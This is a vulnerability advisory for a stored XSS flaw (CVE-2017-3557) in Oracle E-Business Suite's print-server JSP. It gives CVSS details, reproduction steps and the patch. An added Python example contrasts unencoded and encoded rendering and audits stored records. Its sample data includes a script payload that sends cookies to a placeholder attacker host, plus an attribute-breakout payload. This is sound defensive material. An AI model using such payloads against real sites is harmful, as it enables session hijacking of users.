[ERPSCAN-17-026] XSS – Oracle E-Business Suite JTFFMPRINTSERVER

Application: Oracle E-Business Suite
Versions Affected: Oracle E-Business Suite 12.2.3
Vendor: Oracle
Bugs: XSS
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Authors: Ivan Chalykin (ERPScan)

VULNERABILITY INFORMATION

Class: XSS
Impact: modify content displayed by the web application, steal session/authentication information of a user
Remotely Exploitable: yes
Locally Exploitable: yes
CVE: CVE-2017-3557

CVSS Information

CVSS Base Score v3: 7.1 / 10
CVSS Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) Required (R)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality Low (L)
I: Impact to Integrity High (H)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

An attacker can store a crafted value in the application so that it executes as script in the browser of any administrator or user who later views the affected page, and thereby hijack that user's session data.

VULNERABLE PACKAGES

Oracle E-Business Suite 12.2.3

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU April 2017.

TECHNICAL DESCRIPTION

The “Oracle Fulfillment Management: Print Servers” component is vulnerable to a Stored XSS attack because the “Print Server Name” and “Connection String” parameters are written to the page without sanitization or output encoding.

Vulnerable URL:

http://victim_ebs_server/OA_HTML/jtffmprintserver.jsp

To reproduce the attack, create a print server whose “Print Server Name” or “Connection String” contains an XSS vector; the payload is stored and executes in the browser of anyone who subsequently views the print server page. This JSP is available to all E-Business Suite users.
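The following is an added example, not Oracle's JSP code or ERPScan's exploit. It models the defect described above in Python: the two fields are concatenated into HTML unencoded (the vulnerable rendering), beside the same rendering with context-appropriate output encoding (the fix), plus an audit routine that flags stored print-server records containing HTML-significant characters, which is the check a practitioner would run on existing data before and after applying the CPU. The sample records, the attacker hostname and the HTML row layout are constructed for illustration; the real form parameter names and page markup are not given in the advisory.

```python
import html
import re

# Constructed sample records, keyed by the advisory's field labels (the real
# request parameter names are not given on the page). Record 1 carries a
# script-tag payload in the name; record 2 breaks out of an attribute value.
SAMPLE_PRINT_SERVERS = [
    {"Print Server Name": "hq-lp01",
     "Connection String": "lpd://10.0.0.5:515"},
    {"Print Server Name": "<script>document.location='http://attacker.invalid/?c='"
                          "+document.cookie</script>",
     "Connection String": "lpd://10.0.0.6:515"},
    {"Print Server Name": "lab-lp",
     "Connection String": "\" onmouseover=\"alert(1)\" x=\""},
]

FIELDS = ("Print Server Name", "Connection String")

# Hypothetical row layout: name in text context, connection string in an
# attribute context. Both contexts matter for the encoding below.
ROW_TEMPLATE = '<tr><td>%s</td><td><input value="%s"></td></tr>'


def render_row_vulnerable(server):
    """Models the defect: stored values are emitted into HTML as-is."""
    return ROW_TEMPLATE % (server["Print Server Name"],
                           server["Connection String"])


def render_row_fixed(server):
    """Same row with output encoding. html.escape(quote=True) encodes
    < > & " ' so a value can neither open a tag in text context nor
    terminate the attribute it sits in."""
    return ROW_TEMPLATE % (html.escape(server["Print Server Name"], quote=True),
                           html.escape(server["Connection String"], quote=True))


# Characters that are significant in HTML text or attribute context.
MARKUP_CHARS = re.compile(r'[<>"\'&]')


def find_suspicious(servers):
    """Audit stored records: return (index, field) pairs whose value contains
    HTML-significant characters. Legitimate print server names and connection
    strings should not need any of them, so a hit is worth manual review."""
    hits = []
    for i, server in enumerate(servers):
        for field in FIELDS:
            if MARKUP_CHARS.search(server[field]):
                hits.append((i, field))
    return hits


def contains_active_markup(rendered):
    """Crude check on rendered output: an unescaped script tag or an attribute
    breakout means the payload would run in the viewer's browser."""
    lowered = rendered.lower()
    return "<script" in lowered or 'onmouseover="' in lowered


if __name__ == "__main__":
    for idx, server in enumerate(SAMPLE_PRINT_SERVERS):
        print("record", idx)
        print("  vulnerable:", render_row_vulnerable(server))
        print("  fixed:     ", render_row_fixed(server))
    print("records needing review:", find_suspicious(SAMPLE_PRINT_SERVERS))
```

Encoding at output time is the fix that survives new input vectors; rejecting the characters at input time is a reasonable interim workaround but does not clean up records an attacker already stored, which is why the audit routine is included.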